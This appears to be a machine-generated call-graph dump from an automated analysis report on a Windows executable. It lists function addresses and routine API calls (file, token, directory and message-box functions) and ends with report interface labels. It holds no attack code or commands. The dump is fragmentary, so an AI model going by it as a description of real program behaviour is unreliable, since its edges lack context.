calls 18045->18047 18048 7ff65e29a948 __free_lconv_mon 11 API calls 18046->18048 18047->18049 18048->18049 18049->18039 18051 7ff65e29b2c8 _get_daylight 11 API calls 18050->18051 18052 7ff65e295177 18051->18052 18053 7ff65e2829e5 18052->18053 18054 7ff65e29eb98 _get_daylight 11 API calls 18052->18054 18057 7ff65e2951b7 18052->18057 18053->17994 18055 7ff65e2951ac 18054->18055 18056 7ff65e29a948 __free_lconv_mon 11 API calls 18055->18056 18056->18057 18057->18053 18206 7ff65e29ec20 18057->18206 18060 7ff65e29a900 _isindst 17 API calls 18061 7ff65e2951fc 18060->18061 18063 7ff65e28262f 18062->18063 18064 7ff65e289390 2 API calls 18063->18064 18065 7ff65e282660 18064->18065 18066 7ff65e282683 MessageBoxA 18065->18066 18067 7ff65e28266f MessageBoxW 18065->18067 18068 7ff65e282690 18066->18068 18067->18068 18069 7ff65e28c550 _log10_special 8 API calls 18068->18069 18070 7ff65e2826a0 18069->18070 18070->17998 18072 7ff65e292c4e 18071->18072 18077 7ff65e292c3e 18071->18077 18073 7ff65e292c57 18072->18073 18079 7ff65e292c85 18072->18079 18076 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18073->18076 18074 7ff65e292c7d 18074->18041 18074->18043 18074->18044 18074->18045 18075 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18075->18074 18076->18074 18077->18075 18078 7ff65e2947c0 45 API calls 18078->18079 18079->18074 18079->18077 18079->18078 18081 7ff65e292f34 18079->18081 18085 7ff65e2935a0 18079->18085 18111 7ff65e293268 18079->18111 18141 7ff65e292af0 18079->18141 18083 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18081->18083 18083->18077 18086 7ff65e2935e2 18085->18086 18087 7ff65e293655 18085->18087 18090 7ff65e29367f 18086->18090 18091 7ff65e2935e8 18086->18091 18088 7ff65e2936af 18087->18088 18089 7ff65e29365a 18087->18089 18088->18090 18101 7ff65e2936be 18088->18101 18109 7ff65e293618 18088->18109 18092 7ff65e29368f 18089->18092 18093 7ff65e29365c 18089->18093 18158 7ff65e291b50 18090->18158 18098 7ff65e2935ed 18091->18098 18091->18101 18165 7ff65e291740 18092->18165 18094 7ff65e2935fd 18093->18094 18100 7ff65e29366b 18093->18100 18110 7ff65e2936ed 18094->18110 18144 7ff65e293f04 18094->18144 18098->18094 18099 7ff65e293630 18098->18099 18098->18109 18099->18110 18154 7ff65e2943c0 18099->18154 18100->18090 18103 7ff65e293670 18100->18103 18101->18110 18172 7ff65e291f60 18101->18172 18106 7ff65e294558 37 API calls 18103->18106 18103->18110 18105 7ff65e28c550 _log10_special 8 API calls 18107 7ff65e293983 18105->18107 18106->18109 18107->18079 18109->18110 18179 7ff65e29e858 18109->18179 18110->18105 18112 7ff65e293273 18111->18112 18113 7ff65e293289 18111->18113 18115 7ff65e2932c7 18112->18115 18116 7ff65e2935e2 18112->18116 18117 7ff65e293655 18112->18117 18114 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18113->18114 18113->18115 18114->18115 18115->18079 18120 7ff65e29367f 18116->18120 18121 7ff65e2935e8 18116->18121 18118 7ff65e2936af 18117->18118 18119 7ff65e29365a 18117->18119 18118->18120 18130 7ff65e2936be 18118->18130 18139 7ff65e293618 18118->18139 18122 7ff65e29368f 18119->18122 18123 7ff65e29365c 18119->18123 18125 7ff65e291b50 38 API calls 18120->18125 18128 7ff65e2935ed 18121->18128 18121->18130 18126 7ff65e291740 38 API calls 18122->18126 18124 7ff65e2935fd 18123->18124 18132 7ff65e29366b 18123->18132 18127 7ff65e293f04 47 API calls 18124->18127 18140 7ff65e2936ed 18124->18140 18125->18139 18126->18139 18127->18139 18128->18124 18129 7ff65e293630 18128->18129 18128->18139 18133 7ff65e2943c0 47 API calls 18129->18133 18129->18140 18131 7ff65e291f60 38 API calls 18130->18131 18130->18140 18131->18139 18132->18120 18134 7ff65e293670 18132->18134 18133->18139 18136 7ff65e294558 37 API calls 18134->18136 18134->18140 18135 7ff65e28c550 _log10_special 8 API calls 18137 7ff65e293983 18135->18137 18136->18139 18137->18079 18138 7ff65e29e858 47 API calls 18138->18139 18139->18138 18139->18140 18140->18135 18189 7ff65e290d14 18141->18189 18145 7ff65e293f26 18144->18145 18146 7ff65e290b80 12 API calls 18145->18146 18147 7ff65e293f6e 18146->18147 18148 7ff65e29e570 46 API calls 18147->18148 18149 7ff65e294041 18148->18149 18150 7ff65e2947c0 45 API calls 18149->18150 18151 7ff65e294063 18149->18151 18150->18151 18152 7ff65e2947c0 45 API calls 18151->18152 18153 7ff65e2940ec 18151->18153 18152->18153 18153->18109 18155 7ff65e294440 18154->18155 18156 7ff65e2943d8 18154->18156 18155->18109 18156->18155 18157 7ff65e29e858 47 API calls 18156->18157 18157->18155 18159 7ff65e291b83 18158->18159 18160 7ff65e291bb2 18159->18160 18162 7ff65e291c6f 18159->18162 18161 7ff65e290b80 12 API calls 18160->18161 18164 7ff65e291bef 18160->18164 18161->18164 18163 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18162->18163 18163->18164 18164->18109 18166 7ff65e291773 18165->18166 18167 7ff65e2917a2 18166->18167 18169 7ff65e29185f 18166->18169 18168 7ff65e290b80 12 API calls 18167->18168 18171 7ff65e2917df 18167->18171 18168->18171 18170 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18169->18170 18170->18171 18171->18109 18173 7ff65e291f93 18172->18173 18174 7ff65e291fc2 18173->18174 18177 7ff65e29207f 18173->18177 18175 7ff65e291fff 18174->18175 18176 7ff65e290b80 12 API calls 18174->18176 18175->18109 18176->18175 18178 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18177->18178 18178->18175 18180 7ff65e29e880 18179->18180 18181 7ff65e29e8c5 18180->18181 18182 7ff65e2947c0 45 API calls 18180->18182 18184 7ff65e29e885 __scrt_get_show_window_mode 18180->18184 18188 7ff65e29e8ae __scrt_get_show_window_mode 18180->18188 18181->18184 18185 7ff65e2a07e8 WideCharToMultiByte 18181->18185 18181->18188 18182->18181 18183 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18183->18184 18184->18109 18186 7ff65e29e9a1 18185->18186 18186->18184 18187 7ff65e29e9b6 GetLastError 18186->18187 18187->18184 18187->18188 18188->18183 18188->18184 18190 7ff65e290d41 18189->18190 18191 7ff65e290d53 18189->18191 18192 7ff65e294f08 _get_daylight 11 API calls 18190->18192 18194 7ff65e290d60 18191->18194 18197 7ff65e290d9d 18191->18197 18193 7ff65e290d46 18192->18193 18196 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 18193->18196 18195 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 18194->18195 18204 7ff65e290d51 18195->18204 18196->18204 18198 7ff65e290e46 18197->18198 18199 7ff65e294f08 _get_daylight 11 API calls 18197->18199 18200 7ff65e294f08 _get_daylight 11 API calls 18198->18200 18198->18204 18201 7ff65e290e3b 18199->18201 18202 7ff65e290ef0 18200->18202 18203 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 18201->18203 18205 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 18202->18205 18203->18198 18204->18079 18205->18204 18211 7ff65e29ec3d 18206->18211 18207 7ff65e29ec42 18208 7ff65e2951dd 18207->18208 18209 7ff65e294f08 _get_daylight 11 API calls 18207->18209 18208->18053 18208->18060 18210 7ff65e29ec4c 18209->18210 18212 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 18210->18212 18211->18207 18211->18208 18213 7ff65e29ec8c 18211->18213 18212->18208 18213->18208 18214 7ff65e294f08 _get_daylight 11 API calls 18213->18214 18214->18210 18216 7ff65e298245 18215->18216 18217 7ff65e298258 18215->18217 18218 7ff65e294f08 _get_daylight 11 API calls 18216->18218 18225 7ff65e297ebc 18217->18225 18220 7ff65e29824a 18218->18220 18222 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 18220->18222 18223 7ff65e298256 18222->18223 18223->17380 18232 7ff65e2a02d8 EnterCriticalSection 18225->18232 18234 7ff65e2885b1 GetTokenInformation 18233->18234 18237 7ff65e288633 __vcrt_freefls 18233->18237 18235 7ff65e2885d2 GetLastError 18234->18235 18236 7ff65e2885dd 18234->18236 18235->18236 18235->18237 18236->18237 18240 7ff65e2885f9 GetTokenInformation 18236->18240 18238 7ff65e288646 CloseHandle 18237->18238 18239 7ff65e28864c 18237->18239 18238->18239 18239->17385 18240->18237 18241 7ff65e28861c 18240->18241 18241->18237 18242 7ff65e288626 ConvertSidToStringSidW 18241->18242 18242->18237 18244 7ff65e28c850 18243->18244 18245 7ff65e282b74 GetCurrentProcessId 18244->18245 18246 7ff65e2826b0 48 API calls 18245->18246 18247 7ff65e282bc7 18246->18247 18248 7ff65e294bd8 48 API calls 18247->18248 18249 7ff65e282c10 MessageBoxW 18248->18249 18250 7ff65e28c550 _log10_special 8 API calls 18249->18250 18251 7ff65e282c40 18250->18251 18251->17395 18253 7ff65e2825e5 18252->18253 18254 7ff65e294bd8 48 API calls 18253->18254 18255 7ff65e282604 18254->18255 18255->17412 18291 7ff65e298794 18256->18291 18260 7ff65e2881dc 18259->18260 18261 7ff65e289390 2 API calls 18260->18261 18262 7ff65e2881fb 18261->18262 18263 7ff65e288203 18262->18263 18264 7ff65e288216 ExpandEnvironmentStringsW 18262->18264 18265 7ff65e282810 49 API calls 18263->18265 18266 7ff65e28823c __vcrt_freefls 18264->18266 18267 7ff65e28820f __vcrt_freefls 18265->18267 18268 7ff65e288240 18266->18268 18269 7ff65e288253 18266->18269 18332 7ff65e2a1558 18291->18332 18391 7ff65e2a12d0 18332->18391 18422 7ff65e28456a 18421->18422 18423 7ff65e289390 2 API calls 18422->18423 18424 7ff65e28458f 18423->18424 18425 7ff65e28c550 _log10_special 8 API calls 18424->18425 18426 7ff65e2845b7 18425->18426 18426->17448 18429 7ff65e287e2e 18427->18429 18428 7ff65e287f52 18432 7ff65e28c550 _log10_special 8 API calls 18428->18432 18429->18428 18430 7ff65e281c80 49 API calls 18429->18430 18431 7ff65e287eb5 18430->18431 18431->18428 18434 7ff65e281c80 49 API calls 18431->18434 18435 7ff65e284560 10 API calls 18431->18435 18436 7ff65e287f0b 18431->18436 18433 7ff65e287f83 18432->18433 18433->17448 18434->18431 18435->18431 18437 7ff65e289390 2 API calls 18436->18437 18438 7ff65e287f23 CreateDirectoryW 18437->18438 18438->18428 18438->18431 18440 7ff65e281637 18439->18440 18441 7ff65e281613 18439->18441 18443 7ff65e2845c0 108 API calls 18440->18443 18560 7ff65e281050 18441->18560 18445 7ff65e28164b 18443->18445 18444 7ff65e281618 18446 7ff65e28162e 18444->18446 18451 7ff65e282710 54 API calls 18444->18451 18447 7ff65e281653 18445->18447 18448 7ff65e281682 18445->18448 18446->17448 18449 7ff65e294f08 _get_daylight 11 API calls 18447->18449 18450 7ff65e2845c0 108 API calls 18448->18450 18452 7ff65e281658 18449->18452 18453 7ff65e281696 18450->18453 18451->18446 18454 7ff65e282910 54 API calls 18452->18454 18455 7ff65e2816b8 18453->18455 18456 7ff65e28169e 18453->18456 18457 7ff65e281671 18454->18457 18459 7ff65e2906d4 73 API calls 18455->18459 18458 7ff65e282710 54 API calls 18456->18458 18457->17448 18460 7ff65e2816ae 18458->18460 18461 7ff65e2816cd 18459->18461 18488 7ff65e28718b 18487->18488 18490 7ff65e287144 18487->18490 18488->17448 18490->18488 18624 7ff65e295024 18490->18624 18492 7ff65e2841a1 18491->18492 18493 7ff65e2844e0 49 API calls 18492->18493 18494 7ff65e2841db 18493->18494 18495 7ff65e2844e0 49 API calls 18494->18495 18496 7ff65e2841eb 18495->18496 18497 7ff65e28420d 18496->18497 18498 7ff65e28423c 18496->18498 18639 7ff65e284110 18497->18639 18500 7ff65e284110 51 API calls 18498->18500 18501 7ff65e28423a 18500->18501 18502 7ff65e28429c 18501->18502 18503 7ff65e284267 18501->18503 18505 7ff65e284110 51 API calls 18502->18505 18646 7ff65e287cf0 18503->18646 18536 7ff65e281c80 49 API calls 18535->18536 18537 7ff65e284474 18536->18537 18537->17448 18561 7ff65e2845c0 108 API calls 18560->18561 18562 7ff65e28108c 18561->18562 18563 7ff65e2810a9 18562->18563 18564 7ff65e281094 18562->18564 18565 7ff65e2906d4 73 API calls 18563->18565 18566 7ff65e282710 54 API calls 18564->18566 18567 7ff65e2810bf 18565->18567 18572 7ff65e2810a4 __vcrt_freefls 18566->18572 18568 7ff65e2810e6 18567->18568 18569 7ff65e2810c3 18567->18569 18574 7ff65e2810f7 18568->18574 18575 7ff65e281122 18568->18575 18570 7ff65e294f08 _get_daylight 11 API calls 18569->18570 18571 7ff65e2810c8 18570->18571 18572->18444 18577 7ff65e294f08 _get_daylight 11 API calls 18574->18577 18576 7ff65e281129 18575->18576 18585 7ff65e28113c 18575->18585 18625 7ff65e29505e 18624->18625 18626 7ff65e295031 18624->18626 18628 7ff65e295081 18625->18628 18629 7ff65e29509d 18625->18629 18627 7ff65e294f08 _get_daylight 11 API calls 18626->18627 18631 7ff65e294fe8 18626->18631 18630 7ff65e29503b 18627->18630 18632 7ff65e294f08 _get_daylight 11 API calls 18628->18632 18633 7ff65e294f4c 45 API calls 18629->18633 18634 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 18630->18634 18631->18490 18635 7ff65e295086 18632->18635 18638 7ff65e295091 18633->18638 18636 7ff65e295046 18634->18636 18637 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 18635->18637 18636->18490 18637->18638 18638->18490 18640 7ff65e284136 18639->18640 18641 7ff65e294984 49 API calls 18640->18641 18703 7ff65e295ec8 18702->18703 18704 7ff65e295eee 18703->18704 18707 7ff65e295f21 18703->18707 18705 7ff65e294f08 _get_daylight 11 API calls 18704->18705 18706 7ff65e295ef3 18705->18706 18710 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 18706->18710 18708 7ff65e295f34 18707->18708 18709 7ff65e295f27 18707->18709 18721 7ff65e29ac28 18708->18721 18711 7ff65e294f08 _get_daylight 11 API calls 18709->18711 18713 7ff65e284616 18710->18713 18711->18713 18713->17473 18734 7ff65e2a02d8 EnterCriticalSection 18721->18734 19094 7ff65e2978f8 19093->19094 19097 7ff65e2973d4 19094->19097 19096 7ff65e297911 19096->17481 19098 7ff65e29741e 19097->19098 19099 7ff65e2973ef 19097->19099 19107 7ff65e29546c EnterCriticalSection 19098->19107 19100 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 19099->19100 19106 7ff65e29740f 19100->19106 19106->19096 19109 7ff65e28fe71 19108->19109 19110 7ff65e28fe43 19108->19110 19112 7ff65e28fe63 19109->19112 19118 7ff65e29546c EnterCriticalSection 19109->19118 19111 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 19110->19111 19111->19112 19112->17487 19120 7ff65e2845c0 108 API calls 19119->19120 19121 7ff65e281493 19120->19121 19122 7ff65e2814bc 19121->19122 19123 7ff65e28149b 19121->19123 19125 7ff65e2906d4 73 API calls 19122->19125 19124 7ff65e282710 54 API calls 19123->19124 19126 7ff65e2814ab 19124->19126 19127 7ff65e2814d1 19125->19127 19226 7ff65e286375 19225->19226 19227 7ff65e281c80 49 API calls 19226->19227 19228 7ff65e2863b1 19227->19228 19229 7ff65e2863dd 19228->19229 19230 7ff65e2863ba 19228->19230 19232 7ff65e284630 49 API calls 19229->19232 19231 7ff65e282710 54 API calls 19230->19231 19233 7ff65e2863d3 19231->19233 19234 7ff65e2863f5 19232->19234 19238 7ff65e28c550 _log10_special 8 API calls 19233->19238 19235 7ff65e286413 19234->19235 19236 7ff65e282710 54 API calls 19234->19236 19237 7ff65e284560 10 API calls 19235->19237 19236->19235 19239 7ff65e28641d 19237->19239 19240 7ff65e28336e 19238->19240 19241 7ff65e28642b 19239->19241 19242 7ff65e288e80 3 API calls 19239->19242 19240->17587 19256 7ff65e286500 19240->19256 19242->19241 20103 7ff65e2a16b0 20114 7ff65e2a73e4 20103->20114 20116 7ff65e2a73f1 20114->20116 20115 7ff65e29a948 __free_lconv_mon 11 API calls 20115->20116 20116->20115 20117 7ff65e2a740d 20116->20117 20118 7ff65e29a948 __free_lconv_mon 11 API calls 20117->20118 20119 7ff65e2a16b9 20117->20119 20118->20117 20120 7ff65e2a02d8 EnterCriticalSection 20119->20120 16149 7ff65e295628 16150 7ff65e29565f 16149->16150 16151 7ff65e295642 16149->16151 16150->16151 16153 7ff65e295672 CreateFileW 16150->16153 16174 7ff65e294ee8 16151->16174 16155 7ff65e2956a6 16153->16155 16156 7ff65e2956dc 16153->16156 16177 7ff65e29577c GetFileType 16155->16177 16203 7ff65e295c04 16156->16203 16158 7ff65e294f08 _get_daylight 11 API calls 16161 7ff65e29564f 16158->16161 16167 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16161->16167 16163 7ff65e2956d1 CloseHandle 16168 7ff65e29565a 16163->16168 16164 7ff65e2956bb CloseHandle 16164->16168 16165 7ff65e295710 16229 7ff65e2959c4 16165->16229 16166 7ff65e2956e5 16224 7ff65e294e7c 16166->16224 16167->16168 16173 7ff65e2956ef 16173->16168 16175 7ff65e29b2c8 _get_daylight 11 API calls 16174->16175 16176 7ff65e294ef1 16175->16176 16176->16158 16178 7ff65e295887 16177->16178 16179 7ff65e2957ca 16177->16179 16181 7ff65e29588f 16178->16181 16182 7ff65e2958b1 16178->16182 16180 7ff65e2957f6 GetFileInformationByHandle 16179->16180 16188 7ff65e295b00 21 API calls 16179->16188 16183 7ff65e29581f 16180->16183 16184 7ff65e2958a2 GetLastError 16180->16184 16181->16184 16185 7ff65e295893 16181->16185 16186 7ff65e295872 16182->16186 16187 7ff65e2958d4 PeekNamedPipe 16182->16187 16189 7ff65e2959c4 51 API calls 16183->16189 16191 7ff65e294e7c _fread_nolock 11 API calls 16184->16191 16190 7ff65e294f08 _get_daylight 11 API calls 16185->16190 16194 7ff65e28c550 _log10_special 8 API calls 16186->16194 16187->16186 16192 7ff65e2957e4 16188->16192 16193 7ff65e29582a 16189->16193 16190->16186 16191->16186 16192->16180 16192->16186 16246 7ff65e295924 16193->16246 16196 7ff65e2956b4 16194->16196 16196->16163 16196->16164 16198 7ff65e295924 10 API calls 16199 7ff65e295849 16198->16199 16200 7ff65e295924 10 API calls 16199->16200 16201 7ff65e29585a 16200->16201 16201->16186 16202 7ff65e294f08 _get_daylight 11 API calls 16201->16202 16202->16186 16204 7ff65e295c3a 16203->16204 16205 7ff65e294f08 _get_daylight 11 API calls 16204->16205 16218 7ff65e295cd2 __vcrt_freefls 16204->16218 16207 7ff65e295c4c 16205->16207 16206 7ff65e28c550 _log10_special 8 API calls 16208 7ff65e2956e1 16206->16208 16209 7ff65e294f08 _get_daylight 11 API calls 16207->16209 16208->16165 16208->16166 16210 7ff65e295c54 16209->16210 16253 7ff65e297e08 16210->16253 16212 7ff65e295c69 16213 7ff65e295c71 16212->16213 16214 7ff65e295c7b 16212->16214 16215 7ff65e294f08 _get_daylight 11 API calls 16213->16215 16216 7ff65e294f08 _get_daylight 11 API calls 16214->16216 16223 7ff65e295c76 16215->16223 16217 7ff65e295c80 16216->16217 16217->16218 16219 7ff65e294f08 _get_daylight 11 API calls 16217->16219 16218->16206 16220 7ff65e295c8a 16219->16220 16221 7ff65e297e08 45 API calls 16220->16221 16221->16223 16222 7ff65e295cc4 GetDriveTypeW 16222->16218 16223->16218 16223->16222 16225 7ff65e29b2c8 _get_daylight 11 API calls 16224->16225 16226 7ff65e294e89 __free_lconv_mon 16225->16226 16227 7ff65e29b2c8 _get_daylight 11 API calls 16226->16227 16228 7ff65e294eab 16227->16228 16228->16173 16231 7ff65e2959ec 16229->16231 16230 7ff65e29571d 16239 7ff65e295b00 16230->16239 16231->16230 16347 7ff65e29f724 16231->16347 16233 7ff65e295a80 16233->16230 16234 7ff65e29f724 51 API calls 16233->16234 16235 7ff65e295a93 16234->16235 16235->16230 16236 7ff65e29f724 51 API calls 16235->16236 16237 7ff65e295aa6 16236->16237 16237->16230 16238 7ff65e29f724 51 API calls 16237->16238 16238->16230 16240 7ff65e295b1a 16239->16240 16241 7ff65e295b51 16240->16241 16242 7ff65e295b2a 16240->16242 16243 7ff65e29f5b8 21 API calls 16241->16243 16244 7ff65e294e7c _fread_nolock 11 API calls 16242->16244 16245 7ff65e295b3a 16242->16245 16243->16245 16244->16245 16245->16173 16247 7ff65e295940 16246->16247 16248 7ff65e29594d FileTimeToSystemTime 16246->16248 16247->16248 16250 7ff65e295948 16247->16250 16249 7ff65e295961 SystemTimeToTzSpecificLocalTime 16248->16249 16248->16250 16249->16250 16251 7ff65e28c550 _log10_special 8 API calls 16250->16251 16252 7ff65e295839 16251->16252 16252->16198 16254 7ff65e297e92 16253->16254 16255 7ff65e297e24 16253->16255 16290 7ff65e2a07c0 16254->16290 16255->16254 16257 7ff65e297e29 16255->16257 16258 7ff65e297e5e 16257->16258 16259 7ff65e297e41 16257->16259 16273 7ff65e297c4c GetFullPathNameW 16258->16273 16265 7ff65e297bd8 GetFullPathNameW 16259->16265 16264 7ff65e297e56 __vcrt_freefls 16264->16212 16266 7ff65e297bfe GetLastError 16265->16266 16267 7ff65e297c14 16265->16267 16268 7ff65e294e7c _fread_nolock 11 API calls 16266->16268 16271 7ff65e294f08 _get_daylight 11 API calls 16267->16271 16272 7ff65e297c10 16267->16272 16269 7ff65e297c0b 16268->16269 16270 7ff65e294f08 _get_daylight 11 API calls 16269->16270 16270->16272 16271->16272 16272->16264 16274 7ff65e297c7f GetLastError 16273->16274 16277 7ff65e297c95 __vcrt_freefls 16273->16277 16275 7ff65e294e7c _fread_nolock 11 API calls 16274->16275 16276 7ff65e297c8c 16275->16276 16278 7ff65e294f08 _get_daylight 11 API calls 16276->16278 16279 7ff65e297cef GetFullPathNameW 16277->16279 16280 7ff65e297c91 16277->16280 16278->16280 16279->16274 16279->16280 16281 7ff65e297d24 16280->16281 16285 7ff65e297d98 memcpy_s 16281->16285 16286 7ff65e297d4d __scrt_get_show_window_mode 16281->16286 16282 7ff65e297d81 16283 7ff65e294f08 _get_daylight 11 API calls 16282->16283 16284 7ff65e297d86 16283->16284 16287 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16284->16287 16285->16264 16286->16282 16286->16285 16288 7ff65e297dba 16286->16288 16287->16285 16288->16285 16289 7ff65e294f08 _get_daylight 11 API calls 16288->16289 16289->16284 16293 7ff65e2a05d0 16290->16293 16294 7ff65e2a0612 16293->16294 16295 7ff65e2a05fb 16293->16295 16297 7ff65e2a0637 16294->16297 16298 7ff65e2a0616 16294->16298 16296 7ff65e294f08 _get_daylight 11 API calls 16295->16296 16311 7ff65e2a0600 16296->16311 16331 7ff65e29f5b8 16297->16331 16319 7ff65e2a073c 16298->16319 16301 7ff65e2a063c 16306 7ff65e2a06e1 16301->16306 16314 7ff65e2a0663 16301->16314 16303 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16318 7ff65e2a060b __vcrt_freefls 16303->16318 16304 7ff65e2a061f 16305 7ff65e294ee8 _fread_nolock 11 API calls 16304->16305 16307 7ff65e2a0624 16305->16307 16306->16295 16308 7ff65e2a06e9 16306->16308 16310 7ff65e294f08 _get_daylight 11 API calls 16307->16310 16312 7ff65e297bd8 13 API calls 16308->16312 16309 7ff65e28c550 _log10_special 8 API calls 16313 7ff65e2a0731 16309->16313 16310->16311 16311->16303 16312->16318 16313->16264 16315 7ff65e297c4c 14 API calls 16314->16315 16316 7ff65e2a06a7 16315->16316 16317 7ff65e297d24 37 API calls 16316->16317 16316->16318 16317->16318 16318->16309 16320 7ff65e2a0786 16319->16320 16321 7ff65e2a0756 16319->16321 16322 7ff65e2a0791 GetDriveTypeW 16320->16322 16323 7ff65e2a0771 16320->16323 16324 7ff65e294ee8 _fread_nolock 11 API calls 16321->16324 16322->16323 16327 7ff65e28c550 _log10_special 8 API calls 16323->16327 16325 7ff65e2a075b 16324->16325 16326 7ff65e294f08 _get_daylight 11 API calls 16325->16326 16328 7ff65e2a0766 16326->16328 16329 7ff65e2a061b 16327->16329 16330 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16328->16330 16329->16301 16329->16304 16330->16323 16345 7ff65e2aa4d0 16331->16345 16333 7ff65e29f5ee GetCurrentDirectoryW 16334 7ff65e29f605 16333->16334 16335 7ff65e29f62c 16333->16335 16337 7ff65e28c550 _log10_special 8 API calls 16334->16337 16336 7ff65e29eb98 _get_daylight 11 API calls 16335->16336 16338 7ff65e29f63b 16336->16338 16339 7ff65e29f699 16337->16339 16340 7ff65e29f645 GetCurrentDirectoryW 16338->16340 16341 7ff65e29f654 16338->16341 16339->16301 16340->16341 16342 7ff65e29f659 16340->16342 16343 7ff65e294f08 _get_daylight 11 API calls 16341->16343 16344 7ff65e29a948 __free_lconv_mon 11 API calls 16342->16344 16343->16342 16344->16334 16346 7ff65e2aa4c0 16345->16346 16346->16333 16346->16346 16348 7ff65e29f755 16347->16348 16349 7ff65e29f731 16347->16349 16351 7ff65e29f78f 16348->16351 16354 7ff65e29f7ae 16348->16354 16349->16348 16350 7ff65e29f736 16349->16350 16352 7ff65e294f08 _get_daylight 11 API calls 16350->16352 16353 7ff65e294f08 _get_daylight 11 API calls 16351->16353 16355 7ff65e29f73b 16352->16355 16356 7ff65e29f794 16353->16356 16364 7ff65e294f4c 16354->16364 16358 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16355->16358 16359 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16356->16359 16360 7ff65e29f746 16358->16360 16361 7ff65e29f79f 16359->16361 16360->16233 16361->16233 16362 7ff65e29f7bb 16362->16361 16363 7ff65e2a04dc 51 API calls 16362->16363 16363->16362 16365 7ff65e294f70 16364->16365 16366 7ff65e294f6b 16364->16366 16365->16366 16367 7ff65e29b150 __CxxCallCatchBlock 45 API calls 16365->16367 16366->16362 16368 7ff65e294f8b 16367->16368 16372 7ff65e29d984 16368->16372 16373 7ff65e294fae 16372->16373 16374 7ff65e29d999 16372->16374 16376 7ff65e29d9f0 16373->16376 16374->16373 16380 7ff65e2a3304 16374->16380 16377 7ff65e29da05 16376->16377 16379 7ff65e29da18 16376->16379 16377->16379 16393 7ff65e2a2650 16377->16393 16379->16366 16381 7ff65e29b150 __CxxCallCatchBlock 45 API calls 16380->16381 16382 7ff65e2a3313 16381->16382 16383 7ff65e2a335e 16382->16383 16392 7ff65e2a02d8 EnterCriticalSection 16382->16392 16383->16373 16394 7ff65e29b150 __CxxCallCatchBlock 45 API calls 16393->16394 16395 7ff65e2a2659 16394->16395 20624 7ff65e29c520 20635 7ff65e2a02d8 EnterCriticalSection 20624->20635 19949 7ff65e295410 19950 7ff65e29541b 19949->19950 19958 7ff65e29f2a4 19950->19958 19971 7ff65e2a02d8 EnterCriticalSection 19958->19971 19695 7ff65e29f98c 19696 7ff65e29fb7e 19695->19696 19698 7ff65e29f9ce _isindst 19695->19698 19697 7ff65e294f08 _get_daylight 11 API calls 19696->19697 19715 7ff65e29fb6e 19697->19715 19698->19696 19701 7ff65e29fa4e _isindst 19698->19701 19699 7ff65e28c550 _log10_special 8 API calls 19700 7ff65e29fb99 19699->19700 19716 7ff65e2a6194 19701->19716 19706 7ff65e29fbaa 19708 7ff65e29a900 _isindst 17 API calls 19706->19708 19710 7ff65e29fbbe 19708->19710 19713 7ff65e29faab 19713->19715 19741 7ff65e2a61d8 19713->19741 19715->19699 19717 7ff65e29fa6c 19716->19717 19718 7ff65e2a61a3 19716->19718 19723 7ff65e2a5598 19717->19723 19748 7ff65e2a02d8 EnterCriticalSection 19718->19748 19724 7ff65e2a55a1 19723->19724 19725 7ff65e29fa81 19723->19725 19726 7ff65e294f08 _get_daylight 11 API calls 19724->19726 19725->19706 19729 7ff65e2a55c8 19725->19729 19727 7ff65e2a55a6 19726->19727 19728 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 19727->19728 19728->19725 19730 7ff65e2a55d1 19729->19730 19731 7ff65e29fa92 19729->19731 19732 7ff65e294f08 _get_daylight 11 API calls 19730->19732 19731->19706 19735 7ff65e2a55f8 19731->19735 19733 7ff65e2a55d6 19732->19733 19734 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 19733->19734 19734->19731 19736 7ff65e2a5601 19735->19736 19737 7ff65e29faa3 19735->19737 19738 7ff65e294f08 _get_daylight 11 API calls 19736->19738 19737->19706 19737->19713 19739 7ff65e2a5606 19738->19739 19740 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 19739->19740 19740->19737 19749 7ff65e2a02d8 EnterCriticalSection 19741->19749 19981 7ff65e2aadfe 19982 7ff65e2aae17 19981->19982 19983 7ff65e2aae0d 19981->19983 19985 7ff65e2a0338 LeaveCriticalSection 19983->19985

                                                                                                                                                                                                                                                        Executed Functions

                                                                                                                                                                                                                                                        Function 00007FF65E2889E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
